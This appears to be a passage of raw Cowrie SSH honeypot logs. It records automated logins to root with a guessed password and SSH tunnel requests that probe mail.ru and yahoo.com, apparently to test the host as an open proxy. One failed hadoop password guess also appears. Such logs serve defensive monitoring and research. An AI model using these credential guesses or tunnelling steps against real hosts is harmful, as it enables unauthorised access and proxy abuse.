{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:54.940926Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":19036,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:19036","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.084515Z","session":"8f002279646a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.134650Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":7397,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7397","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.276355Z","session":"8f002279646a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.326383Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.377211Z","src_ip":"77.83.207.83","session":"8f002279646a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37109,"dst_ip":"1.2.3.4","dst_port":22,"session":"10dd5e4222ea","protocol":"ssh","message":"New connection: 77.83.207.83:37109 (1.2.3.4:22) [session: 10dd5e4222ea]","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.425579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.427057Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.476775Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.724046Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10932,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:10932","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.774518Z","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.824273Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8884,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:8884","sensor":"my-vps","timestamp":"2025-08-31T03:43:55.964150Z","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.013911Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":13449,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:13449","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.155951Z","session":"10dd5e4222ea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.205756Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.256906Z","src_ip":"77.83.207.83","session":"10dd5e4222ea"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37201,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d5f97d023d3","protocol":"ssh","message":"New connection: 77.83.207.83:37201 (1.2.3.4:22) [session: 2d5f97d023d3]","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.305249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.305964Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.355700Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.603502Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":536,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:536","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.654132Z","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.704054Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":31254,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:31254","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.843862Z","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.893510Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"P@ssw0rd123","message":"login attempt [hadoop/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:43:56.983546Z","src_ip":"212.227.235.229","session":"c60e4489ac0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":19508,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19508","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.035791Z","session":"2d5f97d023d3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.085326Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.136353Z","src_ip":"77.83.207.83","session":"2d5f97d023d3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37280,"dst_ip":"1.2.3.4","dst_port":22,"session":"16b0ce23f5e3","protocol":"ssh","message":"New connection: 77.83.207.83:37280 (1.2.3.4:22) [session: 16b0ce23f5e3]","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.186774Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.196469Z","src_ip":"77.83.207.83","session":"16b0ce23f5e3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.237598Z","src_ip":"77.83.207.83","session":"16b0ce23f5e3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.489894Z","src_ip":"77.83.207.83","session":"16b0ce23f5e3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27570,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27570","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.541744Z","session":"16b0ce23f5e3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.592504Z","src_ip":"77.83.207.83","session":"16b0ce23f5e3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":31565,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:31565","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.737040Z","session":"16b0ce23f5e3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.787842Z","src_ip":"77.83.207.83","session":"16b0ce23f5e3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":5613,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:5613","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.929179Z","session":"16b0ce23f5e3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:57.979927Z","src_ip":"77.83.207.83","session":"16b0ce23f5e3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.031669Z","src_ip":"77.83.207.83","session":"16b0ce23f5e3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37361,"dst_ip":"1.2.3.4","dst_port":22,"session":"e462b1d71069","protocol":"ssh","message":"New connection: 77.83.207.83:37361 (1.2.3.4:22) [session: e462b1d71069]","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.083365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.084301Z","src_ip":"77.83.207.83","session":"e462b1d71069"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.137217Z","src_ip":"77.83.207.83","session":"e462b1d71069"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.401984Z","src_ip":"77.83.207.83","session":"e462b1d71069"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16767,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16767","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.455810Z","session":"e462b1d71069"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.508935Z","src_ip":"77.83.207.83","session":"e462b1d71069"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":1499,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:1499","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.655263Z","session":"e462b1d71069"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.708292Z","src_ip":"77.83.207.83","session":"e462b1d71069"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.819746Z","src_ip":"212.227.235.229","session":"c60e4489ac0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":12206,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12206","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.855243Z","session":"e462b1d71069"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.908333Z","src_ip":"77.83.207.83","session":"e462b1d71069"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:43:58.962168Z","src_ip":"77.83.207.83","session":"e462b1d71069"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":37453,"dst_ip":"1.2.3.4","dst_port":22,"session":"a008d30eeb79","protocol":"ssh","message":"New connection: 77.83.207.83:37453 (1.2.3.4:22) [session: a008d30eeb79]","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.011997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:43:59.012862Z","src_ip":"77.83.207.83","session":"a008d30eeb79"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519